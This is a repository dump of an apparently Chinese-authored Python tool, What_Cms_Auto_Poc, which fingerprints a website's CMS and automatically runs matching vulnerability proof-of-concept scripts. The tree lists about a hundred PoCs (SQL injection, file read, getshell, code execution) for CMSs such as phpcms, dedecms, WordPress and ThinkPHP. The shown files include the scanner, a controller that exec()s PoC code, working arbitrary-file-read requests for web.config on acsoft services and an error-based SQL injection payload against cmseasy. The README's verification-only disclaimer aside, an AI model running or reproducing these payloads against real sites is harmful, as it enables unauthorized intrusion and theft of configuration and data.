├── .idea
├── .gitignore
├── What_Cms_Auto_Poc.iml
├── inspectionProfiles
│ ├── Project_Default.xml
│ └── profiles_settings.xml
├── misc.xml
└── modules.xml
├── README.md
├── What_Cms_Auto_Poc.py
├── cms_data
├── __init__.py
├── data.json
└── get_cms_data.py
├── control_poc.py
├── find_cms
├── CmsScanner.py
├── __init__.py
├── cms_enum.py
└── cms_model.py
└── pocs
├── __init__.py
├── acsoft
├── __init__.py
├── acsoft_GetFileContent_fileread.py
├── acsoft_GetFile_fileread.py
└── acsoft_GetXMLList_fileread.py
├── cmseasy
├── __init__.py
└── cmseasy_header_detail_sqli.py
├── dedecms
├── __init__.py
├── dedecms_download_redirect.py
├── dedecms_error_trace_disclosure.py
├── dedecms_recommend_sqli.py
├── dedecms_search_typeArr_sqli.py
└── dedecms_version.py
├── discuz
├── __init__.py
├── discuz_focus_flashxss.py
├── discuz_forum_message_ssrf.py
├── discuz_plugin_ques_sqli.py
└── discuz_x25_path_disclosure.py
├── dreamgallery
├── __init__.py
└── dreamgallery_album_id_sqli.py
├── ecshop
├── __init__.py
├── ecshop_flow_orderid_sqli.py
└── ecshop_uc_code_sqli.py
├── esccms
├── __init__.py
└── esccms_selectunitmember_unauth.py
├── eyou
├── __init__.py
├── eyou_admin_id_sqli.py
├── eyou_resetpw.py
├── eyou_user_kw_sqli.py
└── eyou_weakpass.py
├── fastmeeting
├── __init__.py
└── fastmeeting_download_filedownload.py
├── finecms
├── __init__.py
└── finecms_uploadfile.py
├── foosun
├── __init__.py
└── foosun_City_ajax_sqli.py
├── fsmcms
├── __init__.py
├── fsmcms_columninfo_sqli.py
├── fsmcms_p_replydetail_sqli.py
└── fsmcms_setup_reinstall.py
├── gowinsoft_jw
├── __init__.py
└── gowinsoft_jw_multi_sqli.py
├── hanweb
├── __init__.py
├── hanweb_VerifyCodeServlet_install.py
├── hanweb_downfile_filedownload.py
└── hanweb_readxml_fileread.py
├── joomla
├── __init__.py
├── joomla_com_docman_lfi.py
└── joomla_index_list_sqli.py
├── kxmail
├── __init__.py
└── kxmail_login_server_sqli.py
├── libsys
├── __init__.py
├── libsys_ajax_asyn_link_fileread.py
├── libsys_ajax_asyn_link_old_fileread.py
└── libsys_ajax_get_file_fileread.py
├── metinfo
├── __init__.py
├── metinfo_getpassword_sqli.py
└── metinfo_login_check_sqli.py
├── pageadmin
├── __init__.py
└── pageadmin_forge_viewstate.py
├── phpcms
├── __init__.py
├── phpcms_authkey_disclosure.py
├── phpcms_digg_add_sqli.py
├── phpcms_flash_upload_sqli.py
├── phpcms_product_code_exec.py
├── phpcms_v961_fileread.py
├── phpcms_v96_sqli.py
└── phpcms_v9_flash_xss.py
├── phpok
├── __init__.py
├── phpok_api_param_sqli.py
├── phpok_remote_image_getshell.py
└── phpok_res_action_control_filedownload.py
├── piaoyou
├── __init__.py
├── piaoyou_int_order_sqli.py
├── piaoyou_multi_sqli.py
├── piaoyou_newsview_list.py
├── piaoyou_six2_sqli.py
├── piaoyou_six_sqli.py
└── piaoyou_ten_sqli.py
├── poc_db.py
├── qibocms
├── __init__.py
├── qibocms_js_f_id_sqli.py
├── qibocms_s_fids_sqli.py
├── qibocms_search_code_exec.py
└── qibocms_search_sqli.py
├── seacms
├── __init__.py
├── seacms_order_code_exec.py
├── seacms_search_code_exec.py
└── seacms_search_jq_code_exec.py
├── shopex
├── __init__.py
└── shopex_phpinfo_disclosure.py
├── shopnc
├── __init__.py
└── shopnc_index_class_id_sqli.py
├── siteengine
├── __init__.py
└── siteengine_comments_module_sqli.py
├── siteserver
├── __init__.py
├── siteserver_UserNameCollection_sqli.py
├── siteserver_background_administrator_sqli.py
├── siteserver_background_keywordsFilting_sqli.py
├── siteserver_background_log_sqli.py
└── siteserver_background_taskLog_sqli.py
├── thinkphp
├── __init__.py
├── onethink_category_sqli.py
├── thinkphp_code_exec.py
└── thinkphp_v5_exec.py
├── thinksns
├── __init__.py
└── thinksns_category_code_exec.py
├── typecho
├── __init__.py
└── typecho_install_code_exec.py
├── umail
├── __init__.py
├── umail_physical_path.py
└── umail_sessionid_access.py
├── urp
├── __init__.py
├── urp_ReadJavaScriptServlet_fileread.py
├── urp_query.py
└── urp_query2.py
├── weaver_oa
├── __init__.py
├── weaver_oa_db_disclosure.py
├── weaver_oa_download_sqli.py
└── weaver_oa_filedownload.py
├── wecenter
├── __init__.py
└── wecenter_topic_id_sqli.py
├── wordpress
├── __init__.py
├── wordpress_admin_ajax_filedownload.py
├── wordpress_display_widgets_backdoor.py
├── wordpress_plugin_ShortCode_lfi.py
├── wordpress_plugin_azonpop_sqli.py
├── wordpress_plugin_mailpress_rce.py
├── wordpress_restapi_sqli.py
├── wordpress_url_redirect.py
└── wordpress_woocommerce_code_exec.py
├── xplus
├── __init__.py
├── xplus_2003_getshell.py
└── xplus_mysql_mssql_sqli.py
├── zfsoft
├── __init__.py
├── xml
│ ├── zfsoft_service_stryhm_sqli_false.xml
│ └── zfsoft_service_stryhm_sqli_true.xml
├── zfsoft_database_control.py
├── zfsoft_default3_bruteforce.py
└── zfsoft_service_stryhm_sqli.py
└── zuitu
├── __init__.py
└── zuitu_coupon_id_sqli.py
/.idea/.gitignore:
--------------------------------------------------------------------------------
1 | # Default ignored files
2 | /shelf/
3 | /workspace.xml
4 |
--------------------------------------------------------------------------------
/.idea/What_Cms_Auto_Poc.iml:
--------------------------------------------------------------------------------
1 |
2 |
3 |
4 |
5 |
6 |
7 |
8 |
--------------------------------------------------------------------------------
/.idea/inspectionProfiles/Project_Default.xml:
--------------------------------------------------------------------------------
1 |
2 |
3 |
4 |
5 |
12 |
13 |
14 |
--------------------------------------------------------------------------------
/.idea/inspectionProfiles/profiles_settings.xml:
--------------------------------------------------------------------------------
1 |
2 |
3 |
4 |
5 |
6 |
--------------------------------------------------------------------------------
/.idea/misc.xml:
--------------------------------------------------------------------------------
1 |
2 |
3 |
4 |
--------------------------------------------------------------------------------
/.idea/modules.xml:
--------------------------------------------------------------------------------
1 |
2 |
3 |
4 |
5 |
6 |
7 |
8 |
--------------------------------------------------------------------------------
/README.md:
--------------------------------------------------------------------------------
1 | # What_Cms_Auto_Poc
2 | What_Cms_Auto_Poc是由本人开发,根据CMS指纹库自动识别CMS,进而加载相关的POC验证漏洞.
3 |
4 |
5 |
6 |
7 | # 使用用法
8 | help 帮助
9 | show 显示参数设置
10 | set url 目标url set url http://example.com/
11 | set type 设置CMS类型,设置后可
12 | 跳过CMS识别 set type example
13 | list 显示支持的CMS
14 | search 搜索POC search example
15 | run 执行
16 | exit 退出
17 |
18 |
19 |
20 | # 平台
21 | python3
22 |
23 |
24 |
25 |
26 | # 说明
27 | 1.部分代码参考网上公开的脚本。
28 |
29 | 2.本工具仅限于进行漏洞验证,如若因此引起相关法律问题,概不负责。
30 |
31 | 3.所有POC均为开源,以后也一直如此,供大家参考和学习。
32 |
33 |
34 |
35 |
36 |
37 |
--------------------------------------------------------------------------------
/What_Cms_Auto_Poc.py:
--------------------------------------------------------------------------------
1 | # -*- coding: utf-8 -*-
2 |
3 | from find_cms import *
4 | from pocs import poc_db
5 | import requests
6 | import control_poc
7 | import urllib3
8 |
9 | urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning)
10 | logo = '''
11 | __ ___ _ ____ _ _
12 | \ \ / / |__ __ _| |_ / ___|_ __ ___ ___ / \ _ _| |_ ___
13 | \ \ /\ / /| '_ \ / _` | __| | | | '_ ` _ \/ __| / _ \| | | | __/ _ \
14 | \ V V / | | | | (_| | |_ | |___| | | | | \__ \ / ___ \ |_| | || (_) |
15 | \_/\_/ |_| |_|\__,_|\__|___\____|_| |_| |_|___/___/_/ \_\__,_|\__\___/
16 | |_____| |_____|
17 | ____
18 | | _ \ ___ ___
19 | | |_) / _ \ / __|
20 | | __/ (_) | (__
21 | ____|_| \___/ \___|
22 | |_____|
23 |
24 | 自动识别目标CMS类型,选择合适的POC验证漏洞 V1.0
25 | '''
26 | usage = '''
27 | opt:
28 | ---------------------------------------------------
29 | help 帮助
30 | show 显示参数设置
31 | set url 目标url set url http://example.com/
32 | set type 设置CMS类型,设置后可
33 | 跳过CMS识别 set type example
34 | list 显示支持的CMS
35 | search 搜索POC search example
36 | run 执行
37 | exit 退出
38 | ---------------------------------------------------
39 | '''
40 |
41 | cms_mode = Cms_Model()
42 | mode = poc_db.poc_db()
43 |
44 |
45 | def get_help():
46 | print(usage)
47 |
48 |
49 | def show():
50 | print(f"[+]url: {cms_mode.url}")
51 | print(f"[+]type: {cms_mode.type}")
52 |
53 |
54 | def url_check(url):
55 | try:
56 | headers = {
57 | "User-Agent": "Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_6_8; en-us) AppleWebKit/534.50 (KHTML, like Gecko) Version/5.1 Safari/534.50"
58 | }
59 | result = requests.get(url, headers=headers, timeout=20, verify=False)
60 | if result.status_code == 200:
61 | return True
62 | else:
63 | return False
64 | except:
65 | return False
66 |
67 |
68 | def run():
69 | if cms_mode.url == "":
70 | print("[+]请输入有效url")
71 | return
72 | if not cms_mode.type:
73 | cms_scanner = CmsScanner(cms_mode)
74 | print("[+]执行中...")
75 | cms_scanner.run()
76 | if not cms_mode.type:
77 | print("[+]无法判断CMS类型")
78 | return
79 | else:
80 | print(f"[+]CMS类型为{cms_mode.name}")
81 | poc = control_poc.control(mode, cms_mode)
82 | poc.auto_poc()
83 |
84 |
85 | def cms_list():
86 | for t in Cms_Enum:
87 | print(f"[+]支持的CMS类型: {t.value}")
88 |
89 |
90 | def search(cms):
91 | poc = control_poc.control(mode, cms_mode)
92 | poc.search(cms)
93 |
94 |
95 | def set_url(url):
96 | global cms_mode
97 | cms_mode = Cms_Model()
98 | if url_check(url):
99 | cms_mode.url = url
100 | else:
101 | print("[+]url地址错误")
102 |
103 |
104 | def set_type(cms_type):
105 | flag = True
106 | for t in Cms_Enum:
107 | if t.value == cms_type:
108 | cms_mode.type = t
109 | flag = False
110 | break
111 | if flag:
112 | print("[+]cms类型不支持")
113 |
114 |
115 | def control(text):
116 | keys = text.split(" ")
117 | if len(keys) > 1:
118 | if keys[0] == "search":
119 | search(keys[1])
120 | elif keys[0] == "set":
121 | if keys[1] == "url":
122 | set_url(keys[2])
123 | elif keys[1] == "type":
124 | set_type(keys[2])
125 | else:
126 | if text == "exit":
127 | exit()
128 | elif text == "help":
129 | get_help()
130 | elif text == "list":
131 | cms_list()
132 | elif text == "show":
133 | show()
134 | elif text == "run":
135 | run()
136 |
137 |
138 | if __name__ == "__main__":
139 | print(logo)
140 | get_help()
141 | while True:
142 | text = input("->")
143 | control(text)
144 |
--------------------------------------------------------------------------------
/cms_data/__init__.py:
--------------------------------------------------------------------------------
1 | from cms_data.get_cms_data import *
2 |
--------------------------------------------------------------------------------
/cms_data/get_cms_data.py:
--------------------------------------------------------------------------------
1 | # -*- coding: utf-8 -*-
2 |
3 | import json, os
4 |
5 |
6 | def get_cms_data():
7 | '''
8 | 打开指纹数据文件,读取数据返回
9 | '''
10 | path = os.getcwd()
11 | with open(path + "/cms_data/data.json", "r", encoding="utf-8") as f:
12 | datas = json.load(f, encoding="utf-8")
13 | re_data = []
14 | md5_data = []
15 | for data in datas:
16 | if data["re"] != "":
17 | re_data.append(data)
18 | else:
19 | md5_data.append(data)
20 | return re_data, md5_data
21 |
--------------------------------------------------------------------------------
/control_poc.py:
--------------------------------------------------------------------------------
1 | # -*- coding: utf-8 -*-
2 |
3 | from pocs import *
4 |
5 |
6 | class control:
7 | '''
8 | POC控制类
9 | '''
10 |
11 | def __init__(self, poc_db, cms_mode):
12 | self.poc_db = poc_db
13 | self.cms_mode = cms_mode
14 |
15 | def search(self, cms):
16 | '''
17 | 根据关键字搜索POC
18 | :return:
19 | '''
20 | for value in self.poc_db.data.values():
21 | for key in value.keys():
22 | if key.find(cms)>=0:
23 | print(f"[+]{key}")
24 |
25 |
26 | def auto_poc(self):
27 | '''
28 | 根据CMS的类型自动加载相应的POC
29 | :return:
30 | '''
31 | if self.cms_mode.type not in self.poc_db.data.keys():
32 | print("CMS类型不支持")
33 | return
34 | for key in self.poc_db.data.keys():
35 | if self.cms_mode.type == key:
36 | for value in self.poc_db.data[key].values():
37 | exec(value)
38 | return
39 |
--------------------------------------------------------------------------------
/find_cms/CmsScanner.py:
--------------------------------------------------------------------------------
1 | # -*- coding: utf-8 -*-
2 |
3 | from cms_data.get_cms_data import *
4 | import hashlib, requests, threading
5 | from find_cms.cms_enum import *
6 | from find_cms.cms_model import *
7 |
8 | '''
9 | class re_find(threading.Thread):
10 |
11 | def __init__(self, cms_model, cms_data):
12 | super.__init__()
13 | self.cms_mode = cms_model
14 | self.cms_data = cms_data
15 |
16 | def get_cms_url(self):
17 |
18 | try:
19 | response = requests.get(self.cms_mode.url + self.cms_data["url"], timeout=5)
20 | if response.status_code == 200:
21 | return response.text
22 | return None
23 | except:
24 | return None
25 |
26 | def run(self):
27 | if self.cms_mode.flag:
28 | return
29 | text = get_cms_data()
30 | if text:
31 | return
32 | if self.cms_data["re"] in text:
33 | self.cms_mode.name = self.cms_data["name"]
34 | self.cms_mode.flag = True
35 |
36 | '''
37 |
38 |
39 | class CmsScanner:
40 | '''cms自动化检测类'''
41 |
42 | def __init__(self, cms_mode):
43 | data = get_cms_data()
44 | self.re_Data = data[0]
45 | self.md5_data = data[1]
46 | self.cms_mode = cms_mode # 以模型传递值
47 | self.flag = False # 判断是否找到类型
48 |
49 | def get_cms_url(self, url):
50 | '''网络请求方法'''
51 | try:
52 | headers = {
53 | "User-Agent": "Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_6_8; en-us) AppleWebKit/534.50 (KHTML, like Gecko) Version/5.1 Safari/534.50"
54 | }
55 | response = requests.get(self.cms_mode.url + url, headers=headers,
56 | timeout=5)
57 | if response.status_code == 200:
58 | return response.text
59 | return None
60 | except:
61 | return None
62 |
63 | def re_find(self, name, re, url):
64 |
65 | text = self.get_cms_url(url)
66 | if text == None:
67 | return
68 | if re in text:
69 | self.cms_mode.name = name
70 | self.flag = True
71 |
72 | def md5_find(self, name, md5, url):
73 | '''文件md5值查找'''
74 | text = self.get_cms_url(url)
75 | if text == None:
76 | return
77 | if md5 == hashlib.md5(text.encode("utf-8")).hexdigest():
78 | self.cms_mode.name = name
79 | self.flag = True
80 |
81 | def cms_type(self):
82 | '''查找类型枚举'''
83 | for cms_t in Cms_Enum:
84 | if cms_t.value == self.cms_mode.name:
85 | self.cms_mode.type = cms_t
86 | break
87 |
88 | def run(self):
89 | find_list = []
90 | for mode in self.re_Data:
91 | if self.flag:
92 | break
93 | task = threading.Thread(target=self.re_find, args=(mode["name"], mode["re"], mode["url"]))
94 | find_list.append(task)
95 | task.start()
96 | for mode in self.md5_data:
97 | if self.flag:
98 | break
99 | task = threading.Thread(target=self.md5_find, args=(mode["name"], mode["md5"], mode["url"]))
100 | find_list.append(task)
101 | task.start()
102 | for task in find_list:
103 | task.join()
104 | if self.cms_mode.name != "":
105 | self.cms_type()
106 |
--------------------------------------------------------------------------------
/find_cms/__init__.py:
--------------------------------------------------------------------------------
1 | from find_cms.CmsScanner import *
2 | from find_cms.cms_enum import *
3 | from find_cms.cms_model import *
--------------------------------------------------------------------------------
/find_cms/cms_enum.py:
--------------------------------------------------------------------------------
1 | # -*- coding: utf-8 -*-
2 |
3 | from enum import Enum
4 |
5 |
6 | class Cms_Enum(Enum):
7 | '''各种cms的枚举类型和说明'''
8 | joomla = "joomla"
9 | phpcms = "phpcms"
10 | dedecms = "dedecms"
11 | seacms = "seacms"
12 | discuz = "discuz"
13 | acsoft = "acsoft"
14 | cmseasy = "cmseasy"
15 | dreamgallery = "dreamgallery"
16 | ecshop = "ecshop"
17 | eyou = "eyou"
18 | fastmeeting = "fastmeeting"
19 | finecms = "finecms"
20 | FoosunCms = "FoosunCms"
21 | fsmcms = "fsmcms"
22 | gowinsoft_jw = "gowinsoft_jw"
23 | hanweb = "hanweb"
24 | kxmail = "kxmail"
25 | libsys = "libsys"
26 | metinfo = "metinfo"
27 | pageadmin = "pageadmin"
28 | phpok = "phpok"
29 | piaoyou = "piaoyou"
30 | qibocms = "qibocms"
31 | shopex = "shopex"
32 | shopnc = "shopnc"
33 | siteengine = "siteengine"
34 | siteserver = "siteserver"
35 | thinkphp = "thinkphp"
36 | thinksns = "thinksns"
37 | typecho = "typecho"
38 | umail = "umail"
39 | urp = "urp"
40 | weaver_oa = "weaver_oa"
41 | wecenter = "wecenter"
42 | wordpress = "wordpress"
43 | xplus = "xplus"
44 | zfsoft = "zfsoft"
45 | zuitu = "zuitu"
46 |
--------------------------------------------------------------------------------
/find_cms/cms_model.py:
--------------------------------------------------------------------------------
1 | # -*- coding: utf-8 -*-
2 |
3 | class Cms_Model:
4 | def __init__(self):
5 | '''cms模型,记录各种参数'''
6 | self.name = ""
7 | self.url = ""
8 | self.type=None
9 | #self.flag
10 |
--------------------------------------------------------------------------------
/pocs/__init__.py:
--------------------------------------------------------------------------------
1 | from pocs.dedecms.dedecms_download_redirect import *
2 | from pocs.dedecms.dedecms_error_trace_disclosure import *
3 | from pocs.dedecms.dedecms_recommend_sqli import *
4 | from pocs.dedecms.dedecms_search_typeArr_sqli import *
5 | from pocs.dedecms.dedecms_version import *
6 |
7 | from pocs.phpcms.phpcms_authkey_disclosure import *
8 | from pocs.phpcms.phpcms_digg_add_sqli import *
9 | from pocs.phpcms.phpcms_flash_upload_sqli import *
10 | from pocs.phpcms.phpcms_product_code_exec import *
11 | from pocs.phpcms.phpcms_v961_fileread import *
12 | from pocs.phpcms.phpcms_v96_sqli import *
13 | from pocs.phpcms.phpcms_v9_flash_xss import *
14 |
15 | from pocs.seacms.seacms_order_code_exec import *
16 | from pocs.seacms.seacms_search_code_exec import *
17 | from pocs.seacms.seacms_search_jq_code_exec import *
18 |
19 | from pocs.discuz.discuz_focus_flashxss import *
20 | from pocs.discuz.discuz_forum_message_ssrf import *
21 | from pocs.discuz.discuz_plugin_ques_sqli import *
22 | from pocs.discuz.discuz_x25_path_disclosure import *
23 |
24 | from pocs.acsoft.acsoft_GetFileContent_fileread import *
25 | from pocs.acsoft.acsoft_GetFile_fileread import *
26 | from pocs.acsoft.acsoft_GetXMLList_fileread import *
27 |
28 | from pocs.cmseasy.cmseasy_header_detail_sqli import *
29 |
30 | from pocs.dreamgallery.dreamgallery_album_id_sqli import *
31 |
32 | from pocs.ecshop.ecshop_flow_orderid_sqli import *
33 | from pocs.ecshop.ecshop_uc_code_sqli import *
34 |
35 | from pocs.eyou.eyou_admin_id_sqli import *
36 | from pocs.eyou.eyou_resetpw import *
37 | from pocs.eyou.eyou_user_kw_sqli import *
38 | from pocs.eyou.eyou_weakpass import *
39 |
40 | from pocs.fastmeeting.fastmeeting_download_filedownload import *
41 |
42 | from pocs.finecms.finecms_uploadfile import *
43 |
44 | from pocs.foosun.foosun_City_ajax_sqli import *
45 |
46 | from pocs.fsmcms.fsmcms_columninfo_sqli import *
47 | from pocs.fsmcms.fsmcms_p_replydetail_sqli import *
48 | from pocs.fsmcms.fsmcms_setup_reinstall import *
49 |
50 | from pocs.gowinsoft_jw.gowinsoft_jw_multi_sqli import *
51 |
52 | from pocs.hanweb.hanweb_VerifyCodeServlet_install import *
53 | from pocs.hanweb.hanweb_downfile_filedownload import *
54 | from pocs.hanweb.hanweb_readxml_fileread import *
55 |
56 | from pocs.joomla.joomla_com_docman_lfi import *
57 | from pocs.joomla.joomla_index_list_sqli import *
58 |
59 | from pocs.kxmail.kxmail_login_server_sqli import *
60 |
61 | from pocs.libsys.libsys_ajax_asyn_link_fileread import *
62 | from pocs.libsys.libsys_ajax_asyn_link_old_fileread import *
63 | from pocs.libsys.libsys_ajax_get_file_fileread import *
64 |
65 | from pocs.metinfo.metinfo_getpassword_sqli import *
66 | from pocs.metinfo.metinfo_login_check_sqli import *
67 |
68 | from pocs.pageadmin.pageadmin_forge_viewstate import *
69 |
70 | from pocs.phpok.phpok_api_param_sqli import *
71 | from pocs.phpok.phpok_remote_image_getshell import *
72 | from pocs.phpok.phpok_res_action_control_filedownload import *
73 |
74 | from pocs.piaoyou.piaoyou_int_order_sqli import *
75 | from pocs.piaoyou.piaoyou_multi_sqli import *
76 | from pocs.piaoyou.piaoyou_newsview_list import *
77 | from pocs.piaoyou.piaoyou_six2_sqli import *
78 | from pocs.piaoyou.piaoyou_six_sqli import *
79 | from pocs.piaoyou.piaoyou_ten_sqli import *
80 |
81 | from pocs.qibocms.qibocms_js_f_id_sqli import *
82 | from pocs.qibocms.qibocms_s_fids_sqli import *
83 | from pocs.qibocms.qibocms_search_code_exec import *
84 | from pocs.qibocms.qibocms_search_sqli import *
85 |
86 | from pocs.shopex.shopex_phpinfo_disclosure import *
87 |
88 | from pocs.shopnc.shopnc_index_class_id_sqli import *
89 |
90 | from pocs.siteengine.siteengine_comments_module_sqli import *
91 |
92 | from pocs.siteserver.siteserver_UserNameCollection_sqli import *
93 | from pocs.siteserver.siteserver_background_administrator_sqli import *
94 | from pocs.siteserver.siteserver_background_keywordsFilting_sqli import *
95 | from pocs.siteserver.siteserver_background_log_sqli import *
96 | from pocs.siteserver.siteserver_background_taskLog_sqli import *
97 |
98 | from pocs.thinkphp.onethink_category_sqli import *
99 | from pocs.thinkphp.thinkphp_code_exec import *
100 | from pocs.thinkphp.thinkphp_v5_exec import *
101 |
102 | from pocs.thinksns.thinksns_category_code_exec import *
103 |
104 | from pocs.typecho.typecho_install_code_exec import *
105 |
106 | from pocs.umail.umail_physical_path import *
107 | from pocs.umail.umail_sessionid_access import *
108 |
109 | from pocs.urp.urp_ReadJavaScriptServlet_fileread import *
110 | from pocs.urp.urp_query import *
111 | from pocs.urp.urp_query2 import *
112 |
113 | from pocs.weaver_oa.weaver_oa_db_disclosure import *
114 | from pocs.weaver_oa.weaver_oa_download_sqli import *
115 | from pocs.weaver_oa.weaver_oa_filedownload import *
116 |
117 | from pocs.wecenter.wecenter_topic_id_sqli import *
118 |
119 | from pocs.wordpress.wordpress_admin_ajax_filedownload import *
120 | from pocs.wordpress.wordpress_display_widgets_backdoor import *
121 | from pocs.wordpress.wordpress_plugin_ShortCode_lfi import *
122 | from pocs.wordpress.wordpress_plugin_azonpop_sqli import *
123 | from pocs.wordpress.wordpress_plugin_mailpress_rce import *
124 | from pocs.wordpress.wordpress_restapi_sqli import *
125 | from pocs.wordpress.wordpress_url_redirect import *
126 | from pocs.wordpress.wordpress_woocommerce_code_exec import *
127 |
128 | from pocs.xplus.xplus_2003_getshell import *
129 | from pocs.xplus.xplus_mysql_mssql_sqli import *
130 |
131 | from pocs.zfsoft.zfsoft_database_control import *
132 | from pocs.zfsoft.zfsoft_default3_bruteforce import *
133 | from pocs.zfsoft.zfsoft_service_stryhm_sqli import *
134 |
135 | from pocs.zuitu.zuitu_coupon_id_sqli import *
--------------------------------------------------------------------------------
/pocs/acsoft/__init__.py:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/Binye234/What_Cms_Auto_Poc/56cae28bfecfe3032efe6578c3f571e5de21a3e9/pocs/acsoft/__init__.py
--------------------------------------------------------------------------------
/pocs/acsoft/acsoft_GetFileContent_fileread.py:
--------------------------------------------------------------------------------
1 | #!/usr/bin/env python
2 | # -*- coding: utf-8 -*-
3 | '''
4 | name: 安财软件GetFileContent任意文件读取
5 | referer: http://www.wooyun.org/bugs/wooyun-2015-0121651
6 | author: Lucifer
7 | description: 文件/WS/WebService.asmx/GetFileContent中,参数fileName存在任意文件读取。
8 | '''
9 | import sys
10 | import json
11 | import requests
12 | import warnings
13 | from termcolor import cprint
14 |
15 | class acsoft_GetFileContent_fileread_BaseVerify:
16 | def __init__(self, url):
17 | self.url = url
18 |
19 | def run(self):
20 | headers = {
21 | "User-Agent":"Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_6_8; en-us) AppleWebKit/534.50 (KHTML, like Gecko) Version/5.1 Safari/534.50"
22 | }
23 | post_data = {
24 | "Content":"1",
25 | "fileName":"web.config"
26 | }
27 | payload = "/WS/WebService.asmx/GetFileContent"
28 | vulnurl = self.url + payload
29 | try:
30 | req = requests.post(vulnurl, data=post_data, headers=headers, timeout=10, verify=False)
31 | if req.headers["Content-Type"] == "application/xml":
32 | cprint("[+]存在安财软件GetFileContent任意文件读取漏洞...(高危)\tpayload: "+vulnurl+"\npost: "+json.dumps(post_data, indent=4), "red")
33 | else:
34 | cprint("[-]不存在acsoft_GetFileContent_fileread漏洞", "white", "on_grey")
35 |
36 | except:
37 | cprint("[-] "+__file__+"====>可能不存在漏洞", "cyan")
38 |
39 | if __name__ == "__main__":
40 | warnings.filterwarnings("ignore")
41 | testVuln = acsoft_GetFileContent_fileread_BaseVerify(sys.argv[1])
42 | testVuln.run()
--------------------------------------------------------------------------------
/pocs/acsoft/acsoft_GetFile_fileread.py:
--------------------------------------------------------------------------------
1 | #!/usr/bin/env python
2 | # -*- coding: utf-8 -*-
3 | '''
4 | name: 安财软件GetFile任意文件读取
5 | referer: http://www.wooyun.org/bugs/wooyun-2015-0121651
6 | author: Lucifer
7 | description: 文件/WS/WebService.asmx/GetFile中,参数FileName存在任意文件读取。
8 | '''
9 | import sys
10 | import json
11 | import requests
12 | import warnings
13 | from termcolor import cprint
14 |
15 | class acsoft_GetFile_fileread_BaseVerify:
16 | def __init__(self, url):
17 | self.url = url
18 |
19 | def run(self):
20 | headers = {
21 | "User-Agent":"Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_6_8; en-us) AppleWebKit/534.50 (KHTML, like Gecko) Version/5.1 Safari/534.50"
22 | }
23 | post_data = {
24 | "VirtualPath":"",
25 | "FileName":"web.config"
26 | }
27 | payload = "/WS/WebService.asmx/GetFile"
28 | vulnurl = self.url + payload
29 | try:
30 | req = requests.post(vulnurl, data=post_data, headers=headers, timeout=10, verify=False)
31 | if req.headers["Content-Type"] == "application/xml":
32 | cprint("[+]存在安财软件GetFile任意文件读取漏洞...(高危)\tpayload: "+vulnurl+"\npost: "+json.dumps(post_data, indent=4), "red")
33 | else:
34 | cprint("[-]不存在acsoft_GetFile_fileread漏洞", "white", "on_grey")
35 |
36 | except:
37 | cprint("[-] "+__file__+"====>可能不存在漏洞", "cyan")
38 |
39 | if __name__ == "__main__":
40 | warnings.filterwarnings("ignore")
41 | testVuln = acsoft_GetFile_fileread_BaseVerify(sys.argv[1])
42 | testVuln.run()
--------------------------------------------------------------------------------
/pocs/acsoft/acsoft_GetXMLList_fileread.py:
--------------------------------------------------------------------------------
1 | #!/usr/bin/env python
2 | # -*- coding: utf-8 -*-
3 | '''
4 | name: 安财软件GetXMLList任意文件读取
5 | referer: http://www.wooyun.org/bugs/wooyun-2015-0121651
6 | author: Lucifer
7 | description: 文件/WS/WebServiceBase.asmx/GetXMLList中,参数strXMLFileName存在任意文件读取。
8 | '''
9 | import sys
10 | import json
11 | import requests
12 | import warnings
13 | from termcolor import cprint
14 |
15 | class acsoft_GetXMLList_fileread_BaseVerify:
16 | def __init__(self, url):
17 | self.url = url
18 |
19 | def run(self):
20 | headers = {
21 | "User-Agent":"Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_6_8; en-us) AppleWebKit/534.50 (KHTML, like Gecko) Version/5.1 Safari/534.50"
22 | }
23 | post_data = {
24 | "strXMLFileName":"../web.config"
25 | }
26 | payload = "/WS/WebServiceBase.asmx/GetXMLList"
27 | vulnurl = self.url + payload
28 | try:
29 | req = requests.post(vulnurl, data=post_data, headers=headers, timeout=10, verify=False)
30 | if req.headers["Content-Type"] == "application/xml":
31 | cprint("[+]存在安财软件GetXMLList任意文件读取漏洞...(高危)\tpayload: "+vulnurl+"\npost: "+json.dumps(post_data, indent=4), "red")
32 | else:
33 | cprint("[-]不存在acsoft_GetXMLList_fileread漏洞", "white", "on_grey")
34 |
35 | except:
36 | cprint("[-] "+__file__+"====>可能不存在漏洞", "cyan")
37 |
38 | if __name__ == "__main__":
39 | warnings.filterwarnings("ignore")
40 | testVuln = acsoft_GetXMLList_fileread_BaseVerify(sys.argv[1])
41 | testVuln.run()
--------------------------------------------------------------------------------
/pocs/cmseasy/__init__.py:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/Binye234/What_Cms_Auto_Poc/56cae28bfecfe3032efe6578c3f571e5de21a3e9/pocs/cmseasy/__init__.py
--------------------------------------------------------------------------------
/pocs/cmseasy/cmseasy_header_detail_sqli.py:
--------------------------------------------------------------------------------
1 |
2 | #!/usr/bin/env python
3 | # -*- coding: utf-8 -*-
4 | '''
5 | name: cmseasy header.php 报错注入
6 | referer: http://www.wooyun.org/bugs/wooyun-2015-0137013
7 | author: Lucifer
8 | description: 文件/coupon/s.php中,参数fids存在SQL注入。
9 | '''
10 | import sys
11 | import json
12 | import requests
13 | import warnings
14 | from termcolor import cprint
15 |
16 | class cmseasy_header_detail_sqli_BaseVerify:
17 | def __init__(self, url):
18 | self.url = url
19 |
20 | def run(self):
21 | headers = {
22 | "User-Agent":"Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_6_8; en-us) AppleWebKit/534.50 (KHTML, like Gecko) Version/5.1 Safari/534.50"
23 | }
24 | post_data = {
25 | "xajax":"Postdata",
26 | "xajaxargs[0]":"detail=xxxxxx'AND(SELECT 1 FROM(SELECT COUNT(*),CONCAT(0x7e,(SELECT (ELT(1=1,md5(1234)))),0x7e,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)AND'1'='1
",
27 | }
28 | payload = "/celive/live/header.php"
29 | vulnurl = self.url + payload
30 | try:
31 | req = requests.post(vulnurl, data=post_data, headers=headers, timeout=10, verify=False)
32 | if r"81dc9bdb52d04dc20036dbd8313ed055" in req.text:
